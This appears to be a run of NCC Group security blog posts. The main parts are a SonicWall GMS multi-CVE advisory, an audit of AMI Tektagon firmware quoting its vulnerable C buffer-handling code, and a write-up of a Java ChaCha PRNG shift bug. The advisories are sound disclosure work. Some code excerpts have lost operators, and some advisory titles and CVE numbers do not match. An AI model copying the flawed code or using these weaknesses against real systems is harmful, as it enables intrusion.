  • Readability: everything should be easy to read. Complex operations should be broken down into simpler components. Readability is what makes it possible to do all of the above. If code is unreadable, it might be correct, but you cannot know it (and usually it means that it is not correct in some specific ways, and you won’t know it, but some attacker might).

An important point here is that performance is not a paramount goal. In “secure, safe, practical, modern”, the word “fast” does not appear. Cryptographic implementations have to be somewhat efficient, because “practical” implies it (if an implementation is too slow, to the point that it is unusable, then it is not practical), but the quest for saving a few extra clock cycles is pointless for most applications. It does not matter whether you can do 10,000 or 20,000 Ed25519 signatures per second on your Web server! Even if that server is very busy, you’ll need at most a couple dozen per second. Extreme optimization of code is an intellectually interesting challenge, and in some very specialized applications it might even matter (especially in small embedded systems with severe operational constraints), but in most applications that you could conceivably develop in Go and run on large computers, safety and practicality are the important features, not speed of an isolated cryptographic primitive.

Thomas Pornin

Real World Cryptography 2024

NCC Group’s Cryptography Services team boasts a strong Canadian contingent, so we were excited to learn that RWC 2024 will take place in Toronto, Canada on March 25–27, 2024. We look forward to catching up with everyone next year!

Technical Advisory – SonicWall Global Management System (GMS) & Analytics – Multiple Critical Vulnerabilities

Multiple Unauthenticated SQL Injection Issues Security Filter Bypass – CVE-2023-34133

Title: Multiple Unauthenticated SQL Injection Issues   Security Filter Bypass
Risk: 9.8 (Critical) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34133
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

The GMS web application was found to be vulnerable to numerous SQL injection issues. Additionally, security mechanisms that were in place to help prevent against SQL Injection attacks could be bypassed.

Impact

An unauthenticated attacker could exploit these issues to extract sensitive information, such as credentials, reset user passwords, bypass authentication, and compromise the underlying device.

Web Service Authentication Bypass – CVE-2023-34124

Title: Web Service Authentication Bypass
Risk: 9.4 (Critical) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34124
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

The authentication mechanism used by the Web Services application did not adequately perform authentication checks, as no secret information was required to perform authentication.

The authentication mechanism employed by the GMS /ws application used a non-secret value when performing HTTP digest authentication. An attacker could easily supply this information, allowing them to gain unauthorised access to the application and call arbitrary Web Service methods.

Impact

An attacker with knowledge of authentication mechanism would be able to generate valid authentication codes for the GMS Web Services application, and subsequently call arbitrary methods. A number of these Web Service methods were found to be vulnerable to additional issues, such as arbitrary file read and write (see CVE-2023-34135, CVE-2023-34129 and CVE-2023-34134). Therefore, this issue could lead to the complete compromise of the host.

Predictable Password Reset Key – CVE-2023-34123

Title: Password Hash Read via Web Service
Risk: 7.5 (High) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34123
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

The GMS /appliance application uses a hardcoded key value to generate password reset keys. This hardcoded value does not change between installs. Furthermore, additional information used during password reset code calculation is non-secret and can be discovered from an unauthenticated perspective.

An attacker with knowledge of this information could generate their own password reset key to reset the administrator account password. Note that this issue is only exploitable in certain configurations. Specifically, if the device is registered, or if it is configured in “Closed Network” mode.

Impact

An attacker with knowledge of the hardcoded 3DES key used to validate password reset codes could generate their own password reset code to gain unauthorised, administrative access to the appliance. An attacker with unauthorised, administrative access to the appliance could exploit additional post-authentication vulnerabilities to achieve Remote Code Execution on the underlying device. Additionally, they could gain access to other devices managed by the GMS appliance.

CAS Authentication Bypass – CVE-2023-34137

Title: CAS Authentication Bypass
Risk: 9.4 (Critical) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:H 
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34137
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

The authentication mechanism used by the CAS Web Service (exposed via /ws/cas) did not adequately perform authentication checks, as it used a hardcoded secret value to perform cryptographic authentication checks. The CAS Web Service validated authentication tokens by calculating the HMAC SHA-1 of the supplied username. However, the HMAC secret was static. As such, an attacker could calculate their own authentication tokens, allowing them to gain unauthorised access to the CAS Web Service.

Impact

An attacker with access to the application source code (for example, by downloading a trial VM), could discover the static value used for calculating HMACs – allowing them to generate their own authentication tokens. An attacker with the ability to generate their own authentication tokens would be able to make legitimate use of the CAS API, as well as exploit further vulnerabilities within this API; for example, SQL Injection – resulting in complete compromise of the underlying host.

Post-Authenticated Command Injection – CVE-2023-34127

Title: Post-Authenticated Command Injection
Risk: 8.8 (High) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34127
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

The GMS application was found to lack sanitization of user-supplied parameters when allowing users to search for log files on the system. This could allow an authenticated attacker to execute arbitrary code with root privileges.

Impact

An authenticated, administrative user can execute code as root on the underlying file system. For example, they could use this vulnerability to write a malicious cron job, web-shell, or stage a remote C2 payload. Note that whilst on its own this issue requires authentication, there were other issues identified (such as CVE-2023-34123) that could be chained with this vulnerability to exploit it from an initially unauthenticated perspective.

Password Hash Read via Web Service – CVE-2023-34134

Title: Password Hash Read via Web Service
Risk: 9.8 (Critical) - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34134
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

An authenticated attacker can read the administrator password hash via a web service call.

Note that whilst this issue requires authentication, it can be chained with an authentication bypass to exploit the issue from an unauthenticated perspective.

Impact

This issue can be chained with CVE-2023-34124 to read the administrator password hash from an unauthenticated perspective. Following this, an attacker could launch further post-authentication attackers to achieve Remote Code Execution.

Post-Authenticated Arbitrary File Read via Backup File Directory Traversal – CVE-2023-34125

Title: Post-Authenticated Arbitrary File Read via Backup File Directory Traversal
Risk: 6.5 (Medium) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34125
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

The GMS application was found to lack sanitization of user-supplied parameters when downloading backup files. This could allow an authenticated attacker to read arbitrary files from the underlying filesystem with root privileges.

Impact

An authenticated, administrative user can read any file on the underlying file system. For example, they could read the password database to retrieve user-passwords hashes, or other sensitive information. Note that whilst on its own this issue requires authentication, there were other issues identified (such as CVE-2023-34123) that could be chained with this vulnerability to exploit it from an initially unauthenticated perspective.

Post-Authenticated Arbitrary File Upload – CVE-2023-34126

Title: Post-Authenticated Arbitrary File Upload
Risk: 7.1 (High) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34126
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

The GMS application was found to lack sanitization of user-supplied parameters when allowing users to upload files to the system. This could allow an authenticated upload files anywhere on the system with root privileges.

Impact

An authenticated, administrative user can upload files as root on the underlying file system. For example, they could use this vulnerability to upload a web-shell. Note that whilst on its own this issue requires authentication, there were other issues identified (such as CVE-2023-34124) that could be chained with this vulnerability to exploit it from an initially unauthenticated perspective.

Post-Authenticated Arbitrary File Write via Web Service (Zip Slip) – CVE-2023-34129

Title: Post-Authenticated Arbitrary File Write via Web Service (Zip Slip)
Risk: 7.1 (High) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34126
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

A web service endpoint was found to be vulnerable to directory traversal whilst extracting a malicious ZIP file (a.k.a. ZipSlip). This could be exploited to write arbitrary files to any location on disk.

Impact

An authenticated attacker may be able to exploit this issue to write arbitrary files to any location on the underlying file system. These files would be written with root privileges. By writing arbitrary files, an attacker could achieve Remote Code Execution. Whilst this issue requires authentication, it could be chained with other issues, such as CVE-2023-34124 (Web Service Authentication Bypass), to exploit it from an initially unauthenticated perspective.

Post-Authenticated Arbitrary File Read via Web Service – CVE-2023-34135

Title: Post-Authenticated Arbitrary File Read via Web Service
Risk: 6.5 (Medium) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier 
CVE Identifier: CVE-2023-34135
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

A web service method allows an authenticated user to read arbitrary files from the underlying file system.

Impact

A remote attacker can read arbitrary files from the underlying file system with the privileges of the Tomcat server (root). When combined with CVE-2023-34124, this issue can allow an unauthenticated attacker to download any file of their choosing. For example, reading the /opt/GMSVP/data/auth.txt file to retrieve the administrator’s password hash.

Client-Side Hashing Function Allows Pass-the-Hash – CVE-2023-34132

Title: CAS Authentication Bypass
Risk: 4.9 (Medium) - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N 
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34132
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

The client-side hashing algorithm used during the logon was found to enable pass-the-hash attacks. As such, an attacker with knowledge of a user’s password hash could log in to the application without knowledge of the underlying plain-text password.

Impact

An attacker who is in possession of a user’s hashed password would be able to log in to the application without knowledge of the underlying plain-text password. By exploiting an issue such as CVE-2023-34134 (Password Hash Read via Web Service), an attacker could first read the user’s password hash, and then log in using that password hash, without ever having to know the underlying plain-text password.

Hardcoded Tomcat Credentials (Privilege Escalation) – CVE-2023-34128)

Title: Hardcoded Tomcat Credentials (Privilege Escalation)
Risk: 6.5 (Medium) - CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34128
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

A number of plain-text credentials were found to be hardcoded both within the application source code and within the users.xml configuration file on the GMS appliance. These credentials did not change between installs and were found to be static. Therefore, an attacker who can decompile the application source code would easily be able to discover these credentials.

Impact

An attacker with access to the Tomcat manager application (via https://localhost/) would be able to utilise the appuser account credentials to gain code execution as the root user, by deploying a malicious WAR file. As the Tomcat manager application is only exposed to localhost by default, an attacker would require an SSRF vulnerability, or the ability to tunnel traffic to the Tomcat Manager port (through SOCKS over SSH, for example). However, this could also be exploited as local privilege escalation vector in the case where an attacker has gained low privileged access to the OS (e.g., via the postgres user or snwlcli users).

Unauthenticated File Upload – CVE-2023-34136

Title: Unauthenticated File Upload
Risk: 5.3 (Medium) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34136
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

An unauthenticated user can upload an arbitrary file to a location not controlled by the attacker.

Impact

Whilst the location of the upload is not controllable by the attacker this vulnerability can be used in conjunction with other vulnerabilities, such as CVE-2023-34127 (Command Injection), to allow an attacker to upload a web-shell as the root user.

Additionally, there are several functions within the GMS application which execute .sh or .bat files from the Tomcat Temp directory. An attacker could upload a malicious script file which might later be executed by the GMS (during a firmware update, for example).

Unauthenticated Sensitive Information Leak – CVE-2023-34131

Title: Unauthenticated Sensitive Information Leak
Risk: 7.5 (High) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34131
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

A number of pages were found to not require any form of authentication, which could allow an attacker to glean sensitive information about the device, such as serial numbers, internal IP addresses and host-names – which could be later used by an attacker as a prerequisite for further attacks.

Impact

An attacker could leak sensitive information such as the device serial number, which could be later used to inform further attacks. As an example, the serial number is required to exploit CVE-2023-34123 (Predictable Password Reset Key). An attacker can easily glean this information by making a simple request to the device, thus decreasing the complexity of such attacks.

Use of Outdated Cryptographic Algorithm with Hardcoded Key – CVE-2023-34130

Title: Unauthenticated Sensitive Information Leak
Risk: 5.3 (Medium) - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N
Versions Affected: GMS Virtual Appliance 9.3.2-SP1 and earlier, GMS Windows 9.3.2-SP1 and earlier, Analytics 2.5.0.4-R7 and earlier
CVE Identifier: CVE-2023-34130
Authors: Richard Warren <richard.warren[at]nccgroup.com>, Sean Morland <sean.morland[at]nccgroup.com>

Description

The GMS application was found make use of a customised version of the Tiny Encryption Algorithm (TEA) to encrypt sensitive data. TEA is a legacy block-cipher which suffers from known weaknesses. It’s usage is discouraged in favour of AES, which provides enhanced security, is widely supported, and is included in most standard libraries (e.g. javax.crypto).

Additionally, the encryption key used by the application was found to be hardcoded within the application source code. This means that regardless of any known weakness in the encryption algorithm, or the method used to encrypt the data, an attacker with access to the source code will be able to decrypt any data encrypted with this key.

Impact

An attacker with access to the source code (for example, by downloading a trial VM), could easily retrieve the hardcoded TEA key. Using this key, the attacker could decrypt sensitive information hardcoded within the web application source code, which could aid in compromising the device.

Furthermore, by combining this issue with various other issues (such as authentication bypass and arbitrary file read), an attacker could retrieve and decrypt configuration files containing user passwords. This would ultimately allow an attacker to compromise both the application and underlying Operating System.

About NCC Group

NCC Group is a global expert in cybersecurity and risk mitigation, working with businesses to protect their brand, value and reputation against the ever-evolving threat landscape. With our knowledge, experience and global footprint, we are best placed to help businesses identify, assess, mitigate respond to the risks they face. We are passionate about making the Internet safer and revolutionizing the way in which organizations think about cybersecurity.

Published date:  2023-08-24

Written by:  Richard Warren

LeaPFRogging PFR Implementations

Back in October of 2022, this announcement by AMI caught my eye. AMI has contributed a product named “Tektagon Open Edition” to the Open Compute Project (OCP). 

Tektagon OpenEdition is an open-source Platform Root of Trust (PRoT) solution with foundational firmware security features that detect platform firmware corruption, recover the firmware and protect firmware integrity. With its open-source code, Tektagon OpenEdition™ augments transparency, resulting in high-quality code […] 

I decided to dig in and audit the recently open sourced code. But first, some background: Tektagon is a hardware root-of-trust (HRoT) that implements Intel PFR 2.0. So… What exactly is PFR? 

Platform Firmware Resiliency 

PFR, or Platform Firmware Resiliency, is a standard defined by everyone’s favorite standards body, NIST, in SP 800-193. The specification describes guidelines that support the resiliency of platform firmware and data against destructive attacks or unauthorized changes. These security properties are upheld by a new HRoT device that implements the PFR logic. 

At its core, PFR acknowledges that in addition to the boot firmware (e.g., the BIOS), a platform contains numerous other peripheral devices which execute firmware and therefore also require integrity verification. Examples of these peripherals typically include GPUs, network cards, storage controllers, display controllers, and so on. Many of these peripherals are highly privileged (e.g., DMA capable), and so they are attractive targets for an attacker. It is important that their firmware images are protected from tampering. That is, if an attacker could compromise one of these peripherals by tampering with its firmware, they might be able to: 

  1. Achieve persistence on the platform across reboots.
  2. Pivot towards compromising other more highly privileged firmware components.  
  3. Violate multi-tenant isolation and confidentiality expectations in cloud environments. 

Although these motivations sound like they are centered around only protecting the integrity of the platform firmware and its data assets, the SP 800-193 specification also describes how PFR is crucial for protecting firmware availability. Here, availability refers to the ability to recover from corrupted flash storage, which might occur due to a failed firmware update, or perhaps, cosmic rays that cause bit flips in flash.

In the PFR specification, these security requirements appear as three guiding principles:  

  1. Protection: How authenticity and integrity of firmware and data should be upheld. 
  2. Detection: How to detect when firmware or data integrity has been violated.  
  3. Recovery: How to restore the platform to a known good state.  

This is a somewhat crowded technology space. In addition to AMI’s Tektagon product, many other vendors have created their own PFR (or PFR-like) solutions whose purpose is to help assure device firmware authenticity and availability, further complicating the already complex x86 system boot process. Examples include Microsoft’s Project Cerberus which is used in Azure, Intel PFR, Google Titan, Lattice’s Root of Trust FPGA solution, and more. 

PFR Attack Surfaces 

PFR introduces a new device, a microcontroller or FPGA, that positions itself as the man-in-the-middle on the flash memory SPI bus. By sitting on the bus, PFR chipsets can interpose all bus transactions. Whenever a device (such as the Board Management Controller (BMC) or Platform Controller Hub (PCH)) reads or writes SPI flash, the PFR chipset proxies that request. This grants PFR the crucial responsibility of verifying the authenticity and integrity of all code and data that resides in the persistent storage media. 

A simplified block diagram of a typical PFR solution

However, by interposing buses in this manner, PFR exposes itself to a rather large attack surface. It must read, parse, and verify various binary blobs (firmware and data) that exist in flash. Such parsing can be a tedious and delicate process. If the code is not written defensively (a challenge for even the best C programmers) then memory safety violations may arise. Another concern is race conditions such as time-of-check-time-of-use (TOCTOU) or double fetch problems. 

The PFR attack surface is also expanded by the fact that it communicates with other devices via I2C or SMBus. The bus typically carries the MCTP and SPDM protocols. Without going into too much detail about these specifications, these protocols are used to:

  1. Establish a secure messaging channel between devices and IP blocks.
  2. Perform device firmware attestation.
  3. Detect and recover from TCB (Trusted Computing Base) failures.

Within the HRoT, these command handlers may accept variable length arguments, and so memory safety is again required when managing the message queues. 

So, with that in mind, I decided to jump into the recently open-sourced AMI Tektagon project and hunt for bugs. 

Vulnerability #1: I2C Command Handler 

This first vulnerability occurs in the PCH/BMC command handler. This is the same I2C communication interface that was mentioned above. Two of the command handlers violate memory safety.  

uint8_t gUfmFifoData[64]; 
uint8_t gReadFifoData[64]; 
... 
uint8_t gFifoData; 
... 
static unsigned int mailBox_index; 

uint8_t PchBmcCommands(unsigned char *CipherText, uint8_t ReadFlag) 
{ 
    byte DataToSend = 0; 
    uint8_t i = 0; 

    switch (CipherText[0]) { 
        ... 
        case UfmCmdTriggerValue: 
            if (ReadFlag == TRUE) { 
                DataToSend = get_provision_commandTrigger(); 
            } else { 
                if (CipherText[1]   EXECUTE_UFM_COMMAND) { 
                    ... 
                } else if (CipherText[1]   FLUSH_WRITE_FIFO) { 
                    memset( gUfmFifoData, 0, sizeof(gUfmFifoData)); 
                    gFifoData = 0; 
                } else if (CipherText[1]   FLUSH_READ_FIFO) { 
                    memset( gReadFifoData, 0, sizeof(gReadFifoData)); 
                    gFifoData = 0; 
                    mailBox_index = 0; 
                } 
            } 
            break; 

        case UfmWriteFIFO: 
            gUfmFifoData[gFifoData++] = CipherText[1]; 
            break; 

        case UfmReadFIFO: 
            DataToSend = gReadFifoData[mailBox_index]; 
            mailBox_index++; 
            break; 
        ...

Above, the UfmWriteFIFO command can eventually write data past the end of the gUfmFifoData[] array. This may occur if the attacker issues more than 64 commands in sequence without flushing the FIFO by sending a UfmCmdTriggerValue command. Because gFifoData is a uint8_t type, this enables an attacker to overwrite up to 192 bytes past the end of the FIFO buffer. 

Similarly, the UfmReadFIFO command can read data out-of-bounds by repeated invocations of the command between FIFO flushes. This OOB data appears to be eventually disclosed in the I2C response message in DataToSend. Because mailbox_index is an unsigned int type, this would enable an attacker to disclose a significant quantity of PFR SRAM, albeit relatively slowly due to only 1 byte being exposed at a time. 

I estimate that these command processing vulnerabilities can be triggered in three different scenarios: 

  1. A physical attacker that is tampering with the I2C bus traffic and injecting PCH/BMC commands to the Tektagon device. Physical attacks can often be discounted for cloud platforms where data centers are expected to be secured facilities, however thought should be given to whether a given deployment is vulnerable to supply chain attacks and hardware implants, as well as malicious or compelled insiders (especially in cases where servers are deployed in third party data centers where physical security is harder to monitor). 
  2. Given the prevalence of BMC vulnerabilities that have been discovered over the last several years, a more likely attack scenario is that a compromised BMC is aiming to pivot towards compromising the Tektagon device in order to undermine the platform’s PFR capabilities or to achieve persistence. 
  3. If the I2C bus happened to be a shared bus with multiple other peripherals of lesser privilege, then one could imagine a scenario where the host kernel (in the CPU) could access this bus and communicate directly with the PFR device, even if that was never the intention. 

Vulnerability #2: SPI Flash Parsing 

The next vulnerability occurs when the Tektagon firmware reads a public key from SPI flash. In the linked GitHub issue, I found and reported five instances where this same bug appears throughout the Tektagon source code, but for the sake of brevity, I will focus on just one simple example here. 

int get_rsa_public_key(uint8_t flash_id, uint32_t address, struct rsa_public_key *public_key) 
{ 
    int status = Success; 
    uint16_t key_length; 
    uint8_t  exponent_length; 
    uint32_t modules_address, exponent_address; 

    // Key Length 
    status = pfr_spi_read(flash_id, address, sizeof(key_length),  key_length); 
    if (status != Success){ 
        return Failure; 
    } 
 
    modules_address = address + sizeof(key_length); 
    // rsa_key_module 
    status = pfr_spi_read(flash_id, modules_address, key_length, public_key->modulus); 
    ... 

The code above performs two SPI flash reads. The first read operation obtains a size value (key_length) from a public key structure in flash, and the second read operation uses this key_length to obtain the RSA public key modulus.  

The bug arises due to lack of input validation. If the contents of external SPI flash were tampered with by an attacker, then key_length may be larger than expected. This length value is not validated before being passed as the size argument to the second pfr_spi_read() call, which can lead to out-of-bounds memory writes of public_key->modulus[].  

The modulus buffer is RSA_MAX_KEY_LENGTH (512) bytes in length, and in all locations where get_rsa_public_key() is called, the public_key structure is declared on the stack. Because the Zephyr build config used by Tektagon does not define CONFIG_STACK_CANARIES, such a stack-based memory corruption vulnerability would be highly exploitable. 

Conclusion

These two vulnerabilities were extremely shallow, and I discovered them both in the same afternoon after first pulling the source code from GitHub. I am fairly certain that other vulnerabilities exist in this code.  

(As an aside, you might also be interested to know that Tektagon is based on the Zephyr RTOS, for which we published a research report a few years back, highlighting numerous vulnerabilities in both its implementation and design.) 

These bugs are great illustrations of how a “security feature” is not always a “secure feature”. Although PFR aims to improve platform security, it does so at the cost of introducing new attack surfaces. Bugs in these attack surfaces can be abused to achieve privilege escalation by the very same adversaries and threats that PFR is designed to defend against – that is, threats involving maliciously tampered SPI flash contents, and adversaries who have compromised a peripheral device and are seeking to pivot laterally to attack another device firmware. 

Think carefully about the threat model of your products, and how adding new features and attack surfaces might affect your overall security posture. As always, we recommend you perform a full assessment of any third-party firmware components before they make it into your product. This is just as true for open source as it is for proprietary code bases, and in particular, new and untested components and technologies. 

As of April 6th 2023, these vulnerabilities were fixed in commit d6d935e. No CVEs were issued by AMI. 

Disclosure Timeline 

  • Oct 25, 2022 – Initial disclosure on GitHub. 
  • Nov 3, 2022 – Response from vendor indicating that fixes are in progress. 
  • Jan 6, 2023 – NCC Group requests an update. 
  • Jan 13, 2023 – Vendor communicated a plan to release fixes by end of January. 
  • Feb 10, 2023 – NCC Group requests an update. 
  • Feb 13, 2023 – Vendor revised plan to release fixes by end of February or early March. 
  • Mar 31, 2023 – NCC Group requests another update.
  • Apr 4, 2023 – Vendor indicates the next release is planned on or before the 2nd week of April.
  • Apr 6, 2023 – Commit d6d935e reorganizes the repo. It fixes vulnerability #1 but only partially fixes vulnerability #2.
  • May 2, 2023 – NCC Group reviewed above commit and provided detailed analysis of the unfixed issues.
  • May 5, 2023 – Vendor communicated that the remaining fixes will land by May 12th.
  • May 31, 2023 – NCC Group queried the status of the fixes.
  • July 25, 2023 – Vendor indicated that remaining unfixed functions are dead/unused code.
  • Aug 18, 2023 – NCC Group reviewed the code to confirm that the functions are unused.
  • Aug 23, 2023 – Publication of this advisory.

Dancing Offbit: The Story of a Single Character Typo that Broke a ChaCha-Based PRNG

Random number generators are the backbone of most cryptographic protocols, the crucial cornerstone upon which the security of all systems rely, yet they remain often overlooked. This blog post presents a real-world vulnerability discovered in the implementation of a Pseudo-Random Number Generator (PRNG) based on the ChaCha20 cipher.

Discovery of a biased PRNG

During a recent engagement, we were tasked with reviewing a ChaCha20-based PRNG, following a design similar to the Rust ChaCha20Rng. The implementation under review was written in Java and a first pass over the source implementation did not reveal any glaring issue.

Similarly, a glance over the output produced by the PRNG seemed normal at first. As an example, the PRNG produced the following 32-byte sequence when seeded with a random seed:

-69, -112, 94, -33, 51, 35, -123, 21, -20, -30, -93, -51, -128, -78, -62, 37, -108, 5, 72, 15, 15, -121, 90, 41, -96, -107, -94, -50, 39, -96, -116, 19

Note that since Java does not support unsigned primitive types, bytes are interpreted in two’s complement representation and a byte can take any value from -128 to 127.

However, when generating longer outputs, some curious patterns started to emerge. Consider the following 128-byte output, seeded with the same random value as before:

-69, -112, 94, -33, 51, 35, -123, 21, -20, -30, -93, -51, -128, -78, -62, 37, -108, 5, 72, 15, 15, -121, 90, 41, -96, -107, -94, -50, 39, -96, -116, 19, 48, 41, 127, -90, -62, -31, -103, -59, -51, 82, 49, 72, 103, -112, 76, -67, 29, -88, 126, -101, -85, -1, -1, -1, 10, 81, 8, -76, -126, -1, -1, -1, -62, -21, 79, 104, -120, 55, -125, -70, 2, 108, -95, 74, -44, 89, -124, -20, 30, 76, -126, 90, 69, -1, -1, -1, 39, -110, -48, -34, 83, -1, -1, -1, 16, 41, 2, 115, -100, 96, 28, -65, -44, -73, 102, -123, 45, -11, -117, -128, 7, -55, -10, -50, -38, -1, -1, -1, 81, 127, -69, -22, 124, 82, 51, 112

Starting at byte 54, sequences of triplets of -1 are repeated multiple times, too often for this pattern to be random. Note that -1 is equivalent to the byte value 0xFF (that is, the byte exclusively composed of 1-bits: 0b1111 1111), but Java interprets and displays that value as -1.

Identifying the root cause

Driven by the feeling that something was amiss, we delved into the code once more and eventually narrowed down the faulty code to the rotateLeft32() function, a critical building block of ChaCha20. This function is excerpted below for convenience.

private static int rotateLeft32(int x, int k) {
    final int n = 32;

    int s = k   (n - 1);
    return x << s | x >> (n - s);
}

At a first glance, this function seems to perform a fairly standard left rotation on 32-bit values. Since Java does not have a primitive type for unsigned integers, this function operates on signed integers. Upon more careful inspection, we discovered something wrong with the right shift operation performed in the return statement of the function. The >> operator used in the function above performs a signed right shift in Java (also known as an arithmetic right shift, or a sign-propagating right shift since it preserves the sign of the resulting number).

When shifting an integer by one with the >> operator, the most significant bit (i.e., the leftmost bit) is not unconditionally replaced by a zero, but by a bit corresponding to the sign bit of the shifted value (0 for a positive integer, 1 for a negative integer). Since the return value of the rotateLeft32() function is computed using a boolean “or” of that shifted quantity, a superfluous 1-bit resulting from shifting a negative input value will be propagated to the output. Hence, the rotateLeft32() function may produce incorrect results when performing the bitwise rotation of negative 32-bit integers.

In contrast, the operator >>> performs an unsigned right shift (or logical right shift) in Java, where the extra bits shifted off to the right are discarded and replaced with zero bits regardless of the sign of the original value. It is this operator that should have been used in the rotateLeft32() function. This subtle difference is very specific to Java. In Rust for example, the type of the value shifted dictates which shift variant to use, as explained in The Rust Reference book, in the section on Arithmetic and Logical Binary Operators:

Arithmetic right shift on signed integer types, logical right shift on unsigned integer types.

Impact

The impact of this issue in the rotation function could already be observed visually by the repeated presence of -1s. In order to understand why using a signed right shift results in an increased probability of generating -1 bytes, let us look at the ChaCha function using that left rotation operation, namely the Quarter Round function, see RFC 7539:

a += b; d ^= a; d <<<= 16;
c += d; b ^= c; b <<<= 12;
a += b; d ^= a; d <<<= 8;
c += d; b ^= c; b <<<= 7;

For each call to the ChaCha Quarter Round function, internal state variables are left-rotated (using the rotateLeft32() function) by some fixed values, as highlighted above. Consider what happens when left-rotating a value with a single 1-bit using the function above. For illustration purposes, we’ll use the value 0x80000000 which corresponds to the quantity 10000000 00000000 00000000 00000000 (split into 8-bit chunks for clarity, and where obvious repeated sequences of 0s are replaced with ...).

 rotateLeft32(1000 ... 0000, 16)
 = 1000 ... 0000 << 16 | 1000 ... 0000 >> 16
 = 00 ... 0 | 1100 ... 0000 >> 15
 = 1110 ... 0000 >> 14
 = ...
 = 11111111 11111111 10000000 00000000
 = 0xFFFF8000
 = {-1, -1, -128, 0}

In this case, a value containing a single 1-bit as input results in an output consisting of seventeen (17) 1s! This helps explain why the output that originally caught our eye contained so many -1 bytes.

